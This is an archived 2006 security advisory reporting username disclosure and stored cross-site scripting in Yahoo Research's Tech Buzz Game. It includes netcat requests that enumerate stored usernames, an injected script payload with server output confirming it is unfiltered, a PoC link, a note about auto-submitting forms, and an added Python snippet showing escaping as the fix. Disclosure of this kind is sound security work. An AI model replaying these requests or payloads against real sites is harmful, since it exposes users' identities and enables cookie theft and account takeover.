
yahooxss.txt
Posted Aug 27, 2006
Authored by Simo64

Yahoo Research suffers from a cross site scripting vulnerability.

tags | advisory, xss
SHA-256 | 8aab3127ccde7487cf100991b18a4b6e67ce1a3fe226ef69589be14fc5c46e7b

Title: Yahoo! Research Multiple Vulnerabilities

Authors: Simo64 and Simo Ben youssef
Contacts: <simo64_at_morx_org> / <simo_at_morx_org>
Discovered: 02 August 2006
Published: 17 August 2006
MorX Security Research Team
Original Advisory:
http://www.morx.org/YahooResearchMultiple.txt
http://www.morx.org

Service/Product: The Tech Buzz Game

Vendors: Yahoo! Research and O'Reilly Media

Vulnerability: Cross Site Scripting / Users Information Disclosure

Severity: Low/Medium

Tested on: Microsoft IE 6.0, Firefox 1.5 and Opera
(should work in all browsers)


Description:

The Tech Buzz Game is a fledgling research project and demo rather than a
full-fledged Yahoo! product; it is a product of Yahoo! Research and
O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz
scores are powered by Yahoo! Search technology and Yahoo! Search Web
Services. The buzz scoring methodology was originally developed for the
Yahoo! Buzz Index, which tracks web search spikes and trends.

For more details, visit:

http://buzz.research.yahoo.com/dm/info/about.html

Details:

1- Usernames disclosure

The login2.html script is written in a way that stores users' error
information in login.html. If a user fails to sign in to the game, the
error returned by login2.html, together with the username, is stored in
login.html. login.html assigns each request an EID numerical value; in
fact, that information is accessible to anyone through HTTP.

From the login.html source code:

<td valign="top" align="center" >
<form action=hlogin2.html method=post>
<input type=hidden name=cmd value=Domain.login>
<input type=hidden name=error.page value=login.html> <--- stores
information back in login.html

Example:

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=100 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 14:40:46 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7
Transfer-Encoding: chunked
Content-Type: text/html

1d84
--------------------- Scroll down ------------------------
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='wil*******' /></td> <--- a previously stored yahoo ID

<td class="error" align="left" scope="col"></td>

PoC:

http://buzz.research.yahoo.com/dm/login/login.html?eid=[some-random-numbers]

2- Permanent Cross Site Scripting:

login2.html does not only store information and make it publicly
accessible through login.html; it also fails to properly sanitize
user-supplied input passed through the variable "login". After a
successful script injection, the input is stored in login.html under a
specific EID.

Example:

C:\>nc buzz.research.yahoo.com 80
POST /dm/login/login2.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 78
Connection: Closed

cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a

HTTP/1.1 302 Found
Date: Thu, 17 Aug 2006 15:10:47 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Location: /dm/login/login.html?eid=182
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

120
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/dm/login/login.html?eid=182">here</A>.<P>
<HR>

Now let's get login.html?eid=182 to see whether our script was filtered or not.

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=182 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 13:14:18 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html

1d98




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--------------------------Scroll Down ------------------------

Sorry, login failed.</td>
</tr>

<tr>
<td scope="col" align="left" colspan="4">&nbsp;</td>
</tr>
<tr>
<td scope="col" align="left">&nbsp;</td>
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='''><script>alert("a")</script>' /></td> <--- not filtered

PoC:

http://www.morx.org/yahooXSSinject.html

Note: the form needs the user to click to submit; an attacker may use a
form that auto-submits the JS, using for example the onload attribute.
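As an added example (not part of the advisory, and not Yahoo!'s or Newsfutures' code), the following Python stand-in for the login.html rendering shows why the stored "login" value breaks out of the single-quoted value attribute when echoed raw, and how attribute-encoding it (here with Python's html.escape, quote=True) keeps the advisory's own payload inert. The stdlib HTMLParser is used only as an approximation of a browser's tokenizer.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the advisory's login.html error page (not the real
# code). The real page echoed the failed "login" value into a single-quoted
# value='...' attribute without any encoding.
TEMPLATE = "<input type=\"text\" name=\"login\" value='{login}' />"

# The exact payload from the advisory's POST body.
ADVISORY_PAYLOAD = "''><script>alert(\"a\")</script>"


def render_vulnerable(stored_login: str) -> str:
    """Raw interpolation, as the advisory shows login.html doing."""
    return TEMPLATE.format(login=stored_login)


def render_hardened(stored_login: str) -> str:
    """Attribute-encode first. quote=True matters here: the attribute is
    delimited by single quotes, and html.escape only encodes ' and " when
    asked to."""
    return TEMPLATE.format(login=html.escape(stored_login, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def start_tags(markup: str) -> list[str]:
    """Approximate a browser's tokenisation with the stdlib parser: if the
    payload escaped the attribute, a separate 'script' start tag shows up."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def attribute_contained(render, stored_login: str) -> bool:
    """True when the stored value stays inside the single <input> tag."""
    return start_tags(render(stored_login)) == ["input"]


if __name__ == "__main__":
    print(render_vulnerable(ADVISORY_PAYLOAD))
    print(render_hardened(ADVISORY_PAYLOAD))
    print(attribute_contained(render_vulnerable, ADVISORY_PAYLOAD))  # False
    print(attribute_contained(render_hardened, ADVISORY_PAYLOAD))    # True
```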

Impact:

An attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authenticated Yahoo user in the context
of the vulnerable Yahoo website, resulting in the theft of cookie-based
authentication credentials, giving the attacker full access to the victim's
accounts (email box, etc.) as well as other types of attacks.

Workaround:

Avoid clicking on links while signed in to Yahoo.

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.
